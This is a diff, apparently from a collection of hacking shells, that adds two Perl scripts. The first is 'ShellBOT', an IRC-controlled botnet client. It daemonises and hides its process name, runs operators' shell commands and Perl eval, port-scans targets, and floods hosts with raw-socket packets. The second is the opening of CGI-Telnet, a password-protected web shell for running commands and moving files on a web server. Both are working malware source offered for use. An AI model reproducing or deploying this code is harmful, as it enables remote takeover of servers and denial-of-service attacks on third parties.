+use Socket;
+use IO::Select;
+chdir("/");
+$servidor="$ARGV[0]" if $ARGV[0];
+$0="$processo"."\0"x16;;
+my $pid=fork;
+exit if $pid;
+die "Problema com o fork: $!" unless defined($pid);
+
+
+
+our %irc_servers;
+our %DCC;
+my $dcc_sel = new IO::Select->new();
+
+########################################################################
+# Packets�Group CoRpOrAtIoN� - conquistaremos o mundo sem sair de casa!#
+########################################################################
+#BotNet Na Veia :P #
+####################
+
+$sel_cliente = IO::Select->new();
+sub sendraw {
+  if ($#_ == '1') {
+    my $socket = $_[0];
+    print $socket "$_[1]\n";
+  } else {
+      print $IRC_cur_socket "$_[0]\n";
+  }
+}
+
+sub conectar {
+   my $meunick = $_[0];
+   my $servidor_con = $_[1];
+   my $porta_con = $_[2];
+
+   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
+   if (defined($IRC_socket)) {
+     $IRC_cur_socket = $IRC_socket;
+
+     $IRC_socket->autoflush(1);
+     $sel_cliente->add($IRC_socket);
+
+     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
+     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
+     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
+     nick("$meunick");
+     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
+     sleep 1;
+   }
+
+}
+my $line_temp;
+while( 1 ) {
+   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
+   delete($irc_servers{''}) if (defined($irc_servers{''}));
+   &DCC::connections;
+   my @ready = $sel_cliente->can_read(0);
+   next unless(@ready);
+   foreach $fh (@ready) {
+     $IRC_cur_socket = $fh;
+     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
+     $nread = sysread($fh, $msg, 4096);
+     if ($nread == 0) {
+        $sel_cliente->remove($fh);
+        $fh->close;
+        delete($irc_servers{$fh});
+     }
+     @lines = split (/\n/, $msg);
+
+     for(my $c=0; $c<= $#lines; $c++) {
+       $line = $lines[$c];
+       $line=$line_temp.$line if ($line_temp);
+       $line_temp='';
+       $line =~ s/\r$//;
+       unless ($c == $#lines) {
+         parse("$line");
+       } else {
+           if ($#lines == 0) {
+             parse("$line");
+           } elsif ($lines[$c] =~ /\r$/) {
+               parse("$line");
+           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
+               parse("$line");
+           } else {
+               $line_temp = $line;
+           }
+       }
+      }
+   }
+}
+
+
+ 
+sub parse {
+   my $servarg = shift;
+   if ($servarg =~ /^PING \:(.*)/) {
+     sendraw("PONG :$1");
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
+       my $pn=$1; my $onde = $4; my $args = $5;
+       if ($args =~ /^\001VERSION\001$/) {
+         notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
+       }
+       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
+         if ($onde eq "$meunick"){
+           shell("$pn", "$args");
+         }
+         if ($args =~ /^(\Q$meunick\E|\!nod)\s+(.*)/ ) {
+            my $natrix = $1;
+            my $arg = $2;
+            if ($arg =~ /^\!(.*)/) {
+              ircase("$pn","$onde","$1") unless ($natrix eq "!nod" and $arg =~ /^\!nick/);
+            } elsif ($arg =~ /^\@(.*)/) {
+                $ondep = $onde;
+                $ondep = $pn if $onde eq $meunick;
+                bfunc("$ondep","$1");
+            } else {
+                shell("$onde", "$arg");
+            }
+         } 
+       }
+   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
+       if (lc($1) eq lc($meunick)) {
+         $meunick=$4; 
+         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       }
+   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
+       nick("$meunick".int rand(9999));
+   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
+       $meunick = $2;
+       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
+       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
+       foreach my $canal (@canais) {
+         sendraw("JOIN $canal");
+       }
+   }
+}
+
+sub bfunc {
+  my $printl = $_[0];
+  my $funcarg = $_[1];
+  if (my $pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           if ($funcarg =~ /^portscan (.*)/) {
+             my $hostip="$1";
+             my @portas=("21","22","23","25","53","80","110","143");
+             my (@aberta, %porta_banner);
+             foreach my $porta (@portas)  {
+                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
+                if ($scansock) {
+                   push (@aberta, $porta);
+                   $scansock->close;
+                }
+             }
+
+             if (@aberta) {
+               sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
+             } else {
+                 sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada"); 
+             }
+           }
+           if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
+             my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
+             $dtime = 1 if $dtime == 0;
+             my %bytes;
+             $bytes{igmp} = $2 * $pacotes{igmp};
+             $bytes{icmp} = $2 * $pacotes{icmp};
+             $bytes{o} = $2 * $pacotes{o};
+             $bytes{udp} = $2 * $pacotes{udp};
+             $bytes{tcp} = $2 * $pacotes{tcp};
+            
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} +  $pacotes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
+
+
+           }
+           exit;
+       }
+  }
+}
+ 
+sub ircase {
+  my ($kem, $printl, $case) = @_;
+
+  if ($case =~ /^join (.*)/) {
+     j("$1");
+   } 
+   if ($case =~ /^part (.*)/) {
+      p("$1");
+   }
+   if ($case =~ /^rejoin\s+(.*)/) {
+      my $chan = $1;
+      if ($chan =~ /^(\d+) (.*)/) {
+        for (my $ca = 1; $ca <= $1; $ca++ ) {
+          p("$2");
+          j("$2");
+        }
+      } else {
+          p("$chan");
+          j("$chan");
+      }
+   }
+   if ($case =~ /^op/) {
+      op("$printl", "$kem") if $case eq "op";
+      my $oarg = substr($case, 3);
+      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^deop/) {
+      deop("$printl", "$kem") if $case eq "deop";
+      my $oarg = substr($case, 5);
+      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^voice/) {
+      voice("$printl", "$kem") if $case eq "voice";
+      $oarg = substr($case, 6);
+      voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^devoice/) {
+      devoice("$printl", "$kem") if $case eq "devoice";
+      $oarg = substr($case, 8);
+      devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
+   }
+   if ($case =~ /^msg\s+(\S+) (.*)/) {
+      msg("$1", "$2");
+   }
+   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        msg("$2", "$3");
+      }
+   }
+   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
+      ctcp("$1", "$2");
+   }
+   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
+      for (my $cf = 1; $cf <= $1; $cf++) {
+        ctcp("$2", "$3");
+      }
+   }
+   if ($case =~ /^invite\s+(\S+) (.*)/) {
+      invite("$1", "$2");
+   }
+   if ($case =~ /^nick (.*)/) {
+      nick("$1");
+   }
+   if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
+       conectar("$2", "$1", 6667);
+   }
+   if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
+      DCC::SEND("$1", "$2");
+   }
+   if ($case =~ /^raw (.*)/) {
+      sendraw("$1");
+   }
+   if ($case =~ /^eval (.*)/) {
+     eval "$1";
+   }
+}
+sub shell {
+  return unless $secv;
+  my $printl=$_[0];
+  my $comando=$_[1];
+  if ($comando =~ /cd (.*)/) {
+    chdir("$1") || msg("$printl", "Diert?? inexistente!");
+    return;
+  } 
+  elsif ($pid = fork) {
+     waitpid($pid, 0);
+  } else {
+      if (fork) {
+         exit;
+       } else {
+           my @resp=`$comando 2>&1 3>&1`;
+           my $c=0;
+           foreach my $linha (@resp) {
+             $c++;
+             chop $linha;
+             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
+             if ($c == "$linas_max") {
+               $c=0;
+               sleep $sleep;
+             }
+           }
+           exit;
+       }
+  }
+}
+
+#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
+sub attacker {
+  my $iaddr = inet_aton($_[0]);
+  my $msg = 'B' x $_[1];
+  my $ftime = $_[2];
+  my $cp = 0;
+  my (%pacotes);
+  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
+  
+  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
+  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
+  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
+  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
+  return(undef) if $cp == 4;
+  my $itime = time;
+  my ($cur_time);
+  while ( 1 ) {
+     for (my $porta = 1; $porta <= 65535; $porta++) {
+       $cur_time = time - $itime;
+       last if $cur_time >= $ftime;
+       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
+       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
+       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
+       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
+
+       # DoS ?? :P
+       for (my $pc = 3; $pc <= 255;$pc++) {
+         next if $pc == 6;
+         $cur_time = time - $itime;
+         last if $cur_time >= $ftime;
+         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
+         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
+       }
+     }
+     last if $cur_time >= $ftime;
+  }
+  return($cur_time, %pacotes);
+}
+
+
+
+#############
+#  ALIASES  #
+#############
+
+sub action {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
+}
+
+sub ctcp {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
+}
+sub msg {
+   return unless $#_ == 1;
+   sendraw("PRIVMSG $_[0] :$_[1]");
+}  
+
+sub notice {
+   return unless $#_ == 1;
+   sendraw("NOTICE $_[0] :$_[1]");
+}
+
+sub op {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +o $_[1]");
+}
+sub deop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -o $_[1]");
+}
+sub hop {
+    return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub dehop {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +h $_[1]");
+}
+sub voice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +v $_[1]");
+}
+sub devoice {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -v $_[1]");
+}
+sub ban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] +b $_[1]");
+}
+sub unban {
+   return unless $#_ == 1;
+   sendraw("MODE $_[0] -b $_[1]");
+}
+sub kick {
+   return unless $#_ == 1;
+   sendraw("KICK $_[0] $_[1] :$_[2]");
+}
+
+sub modo {
+   return unless $#_ == 0;
+   sendraw("MODE $_[0] $_[1]");
+}
+sub mode { modo(@_); }
+
+sub j { &join(@_); }
+sub join {
+   return unless $#_ == 0;
+   sendraw("JOIN $_[0]");
+}
+sub p { part(@_); }
+sub part {sendraw("PART $_[0]");}
+
+sub nick {
+  return unless $#_ == 0;
+  sendraw("NICK $_[0]");
+}
+
+sub invite {
+   return unless $#_ == 1;
+   sendraw("INVITE $_[1] $_[0]");
+}
+sub topico {
+   return unless $#_ == 1;
+   sendraw("TOPIC $_[0] $_[1]");
+}
+sub topic { topico(@_); }
+
+sub whois {
+  return unless $#_ == 0;
+  sendraw("WHOIS $_[0]");
+}
+sub who {
+  return unless $#_ == 0;
+  sendraw("WHO $_[0]");
+}
+sub names {
+  return unless $#_ == 0;
+  sendraw("NAMES $_[0]");
+}
+sub away {
+  sendraw("AWAY $_[0]");
+}
+sub back { away(); }
+sub quit {
+  sendraw("QUIT :$_[0]");
+}
+
+
+
+# DCC
+package DCC;
+
+sub connections {
+   my @ready = $dcc_sel->can_read(1);
+#   return unless (@ready);
+   foreach my $fh (@ready) {
+     my $dcctipo = $DCC{$fh}{tipo};
+     my $arquivo = $DCC{$fh}{arquivo};
+     my $bytes = $DCC{$fh}{bytes};
+     my $cur_byte = $DCC{$fh}{curbyte};
+     my $nick = $DCC{$fh}{nick};
+
+     my $msg;
+     my $nread = sysread($fh, $msg, 10240);
+
+     if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
+        $DCC{$fh}{status} = "Cancelado";
+        $DCC{$fh}{ftime} = time;
+        $dcc_sel->remove($fh);
+        $fh->close;
+        next;
+     }
+
+     if ($dcctipo eq "get") {
+        $DCC{$fh}{curbyte} += length($msg);
+
+        my $cur_byte = $DCC{$fh}{curbyte};
+
+        open(FILE, ">> $arquivo");
+        print FILE "$msg" if ($cur_byte <= $bytes);
+        close(FILE);
+
+        my $packbyte = pack("N", $cur_byte);
+        print $fh "$packbyte";
+
+        if ($bytes == $cur_byte) {
+           $dcc_sel->remove($fh);
+           $fh->close;
+           $DCC{$fh}{status} = "Recebido";
+           $DCC{$fh}{ftime} = time;
+           next;
+        }
+     } elsif ($dcctipo eq "send") {
+          my $send = $fh->accept;
+          $send->autoflush(1);
+          $dcc_sel->add($send);
+          $dcc_sel->remove($fh);
+          $DCC{$send}{tipo} = 'sendcon';
+          $DCC{$send}{itime} = time;
+          $DCC{$send}{nick} = $nick;
+          $DCC{$send}{bytes} = $bytes;
+          $DCC{$send}{curbyte} = 0;
+          $DCC{$send}{arquivo} = $arquivo;
+          $DCC{$send}{ip} = $send->peerhost;
+          $DCC{$send}{porta} = $send->peerport;
+          $DCC{$send}{status} = "Enviando";
+
+          #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
+          open(FILE, "< $arquivo");
+          my $fbytes;
+          read(FILE, $fbytes, 1024);
+          print $send "$fbytes";
+          close FILE;
+#          delete($DCC{$fh});
+     } elsif ($dcctipo eq 'sendcon') {
+          my $bytes_sended = unpack("N", $msg);
+          $DCC{$fh}{curbyte} = $bytes_sended;
+          if ($bytes_sended == $bytes) {
+             $fh->close;
+             $dcc_sel->remove($fh);
+             $DCC{$fh}{status} = "Enviado";
+             $DCC{$fh}{ftime} = time;
+             next;
+          }
+          open(SENDFILE, "< $arquivo");
+          seek(SENDFILE, $bytes_sended, 0);
+          my $send_bytes;
+          read(SENDFILE, $send_bytes, 1024);
+          print $fh "$send_bytes";
+          close(SENDFILE);
+     }
+   }
+}
+
+
+sub SEND {
+  my ($nick, $arquivo) = @_;
+  unless (-r "$arquivo") {
+    return(0);
+  }
+ 
+  my $dccark = $arquivo;
+  $dccark =~ s/[.*\/](\S+)/$1/;
+
+  my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
+  my $longip = unpack("N",inet_aton($meuip));
+
+  my @filestat = stat($arquivo);
+  my $size_total=$filestat[7];
+  if ($size_total == 0) {
+     return(0);
+  }
+
+  my ($porta, $sendsock);
+  do {
+    $porta = int rand(64511);
+    $porta += 1024;
+    $sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
+  } until $sendsock;
+
+  $DCC{$sendsock}{tipo} = 'send';
+  $DCC{$sendsock}{nick} = $nick;
+  $DCC{$sendsock}{bytes} = $size_total;
+  $DCC{$sendsock}{arquivo} = $arquivo;
+
+
+  &::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
+
+}
+
+sub GET {
+  my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
+  return(0) if (-e "$arquivo");
+  if (open(FILE, "> $arquivo")) {
+     close FILE;
+  } else { 
+    return(0); 
+  }
+
+  my $dccip=fixaddr($dcclongip);
+  return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
+  my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
+  $dccsock->autoflush(1);
+  $dcc_sel->add($dccsock);
+  $DCC{$dccsock}{tipo} = 'get';
+  $DCC{$dccsock}{itime} = time;
+  $DCC{$dccsock}{nick} = $nick;
+  $DCC{$dccsock}{bytes} = $bytes;
+  $DCC{$dccsock}{curbyte} = 0;
+  $DCC{$dccsock}{arquivo} = $arquivo;
+  $DCC{$dccsock}{ip} = $dccip;
+  $DCC{$dccsock}{porta} = $dccporta;
+  $DCC{$dccsock}{status} = "Recebendo";
+}
+
+# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
+sub Status {
+  my $socket = shift;
+  my $sock_tipo = $DCC{$socket}{tipo};
+  unless (lc($sock_tipo) eq "chat") {
+    my $nick = $DCC{$socket}{nick};
+    my $arquivo = $DCC{$socket}{arquivo};
+    my $itime = $DCC{$socket}{itime};
+    my $ftime = time;
+    my $status = $DCC{$socket}{status};
+    $ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
+
+    my $d_time = $ftime-$itime;
+
+    my $cur_byte = $DCC{$socket}{curbyte};
+    my $bytes_total =  $DCC{$socket}{bytes};
+
+    my $rate = 0;
+    $rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
+    my $porcen = ($cur_byte*100)/$bytes_total;
+
+    my ($r_duv, $p_duv);
+    if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $r_duv = $3; $r_duv++ if $4 >= 5;
+       $rate = "$1\.$2"."$r_duv";
+    }
+    if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
+       $p_duv = $3; $p_duv++ if $4 >= 5;
+       $porcen = "$1\.$2"."$p_duv";
+    }
+    return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
+  }
+
+
+  return(0);
+}
+
+
+# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
+sub fixaddr {
+my ($address) = @_;
+
+    chomp $address;     # just in case, sigh.
+    if ($address =~ /^\d+$/) {
+        return inet_ntoa(pack "N", $address);
+    } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
+        return $address;
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } elsif ($address =~ tr/a-zA-Z//) {                    # Whee! Obfuscation!
+        return inet_ntoa(((gethostbyname($address))[4])[0]);
+    } else {
+        return;
+    }
+}
+
+
+                                                                                                                     by Danilo
+
+
+
+ 
diff --git a/xakep-shells/PERL/telnet.pl.txt b/xakep-shells/PERL/telnet.pl.txt
new file mode 100644
index 0000000..774fcdc
--- /dev/null
+++ b/xakep-shells/PERL/telnet.pl.txt
@@ -0,0 +1,692 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+#    your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+#    Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+#    the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "1236987navaro";		# Change this. You will need to enter this
+				# to login.
+
+$WinNT = 0;			# You need to change the value of this to 1 if
+				# you're running this script on a Windows NT
+				# machine. If you're running it on Unix, you
+				# can leave the value as it is.
+
+$NTCmdSep = "&";		# This character is used to seperate 2 commands
+				# in a command line on Windows NT.
+
+$UnixCmdSep = ";";		# This character is used to seperate 2 commands
+				# in a command line on Unix.
+
+$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
+				# Don't set this to a very large value. This is
+				# useful for commands that may hang or that
+				# take very long to execute, like "find /".
+				# This is valid only on Unix servers. It is
+				# ignored on NT Servers.
+
+$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
+				# browser as soon as it is output, otherwise
+				# it is buffered and send when the command
+				# completes. This is useful for commands like
+				# ping, so that you can see the output as it
+				# is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of
+# the variable. Note: Most of the code in this function is taken from other CGI
+# scripts.
+#------------------------------------------------------------------------------
+sub ReadParse 
+{
+	local (*in) = @_ if @_;
+	local ($i, $loc, $key, $val);
+	
+	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
+
+	if($ENV{'REQUEST_METHOD'} eq "GET")
+	{
+		$in = $ENV{'QUERY_STRING'};
+	}
+	elsif($ENV{'REQUEST_METHOD'} eq "POST")
+	{
+		binmode(STDIN) if $MultipartFormData & $WinNT;
+		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
+	}
+
+	# handle file upload data
+	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
+	{
+		$Boundary = '--'.$1; # please refer to RFC1867 
+		@list = split(/$Boundary/, $in); 
+		$HeaderBody = $list[1];
+		$HeaderBody =~ /\r\n\r\n|\n\n/;
+		$Header = $`;
+		$Body = $';
+ 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
+		$in{'filedata'} = $Body;
+		$Header =~ /filename=\"(.+)\"/; 
+		$in{'f'} = $1; 
+		$in{'f'} =~ s/\"//g;
+		$in{'f'} =~ s/\s//g;
+
+		# parse trailer
+		for($i=2; $list[$i]; $i++)
+		{ 
+			$list[$i] =~ s/^.+name=$//;
+			$list[$i] =~ /\"(\w+)\"/;
+			$key = $1;
+			$val = $';
+			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} = $val; 
+		}
+	}
+	else # standard post data (url encoded, not multipart)
+	{
+		@in = split(/&/, $in);
+		foreach $i (0 .. $#in)
+		{
+			$in[$i] =~ s/\+/ /g;
+			($key, $val) = split(/=/, $in[$i], 2);
+			$key =~ s/%(..)/pack("c", hex($1))/ge;
+			$val =~ s/%(..)/pack("c", hex($1))/ge;
+			$in{$key} .= "\0" if (defined($in{$key}));
+			$in{$key} .= $val;
+		}
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML Page Header
+# Argument 1: Form item name to which focus should be set
+#------------------------------------------------------------------------------
+sub PrintPageHeader
+{
+	$EncodedCurrentDir = $CurrentDir;
+	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
+	print "Content-type: text/html\n\n";
+	print <<END;
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
+<html>
+<head>
+<title>CGI-Telnet Version 1.0</title>
+$HtmlMetaHeader
+</head>
+<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
+<table border="1" width="100%" cellspacing="0" cellpadding="2">
+<tr>
+<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
+<b><font color="#000080" size="2">#</font></b></td>
+<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
+</tr>
+<tr>
+<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
+<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
+<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
+<a href="$ScriptLocation?a=logout">Disconnect</a> |
+<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
+</font></td>
+</tr>
+</table>
+<font color="#C0C0C0" size="3">
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the Login Screen
+#------------------------------------------------------------------------------
+sub PrintLoginScreen
+{
+	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
+/  __ \|  __ \|_   _|        |_   _|      | |             | |
+| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
+| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
+| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
+ \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
+                                         
+</font><font color="#FF0000">                      ______             </font><font color="#AE8300">� 2001, Rohitab Batra</font><font color="#FF0000">
+                   .-&quot;      &quot;-.
+                  /            \
+                 |              |
+                 |,  .-.  .-.  ,|
+                 | )(_o/  \o_)( |
+                 |/     /\     \|
+       (@_       (_     ^^     _)
+  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
+</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
+        )_/        \          / 
+       (@           `--------`
+             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
+$;
+#'
+	print <<END;
+<code>
+Trying $ServerName...<br>
+Connected to $ServerName<br>
+Escape character is ^]
+<code>$Message
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the message that informs the user of a failed login
+#------------------------------------------------------------------------------
+sub PrintLoginFailedMessage
+{
+	print <<END;
+<code>
+<br>login: admin<br>
+password:<br>
+Login incorrect<br><br>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the HTML form for logging in
+#------------------------------------------------------------------------------
+sub PrintLoginForm
+{
+	print <<END;
+<code>
+<form name="f" method="POST" action="$ScriptLocation">
+<input type="hidden" name="a" value="login">
+login: admin<br>
+password:<input type="password" name="p">
+<input type="submit" value="Enter">
+</form>
+</code>
+END
+}
+
+#------------------------------------------------------------------------------
+# Prints the footer for the HTML Page
+#------------------------------------------------------------------------------
+sub PrintPageFooter
+{
+	print "</font></body></html>";
+}
+
+#------------------------------------------------------------------------------
+# Retreives the values of all cookies. The cookies can be accesses using the
+# variable $Cookies{''}
+#------------------------------------------------------------------------------
+sub GetCookies
+{
+	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
+	foreach $cookie(@httpcookies)
+	{
+		($id, $val) = split(/=/, $cookie);
+		$Cookies{$id} = $val;
+	}
+}
+
+#------------------------------------------------------------------------------
+# Prints the screen when the user logs out
+#------------------------------------------------------------------------------
+sub PrintLogoutScreen
+{
+	print "<code>Connection closed by foreign host.<br><br></code>";
+}
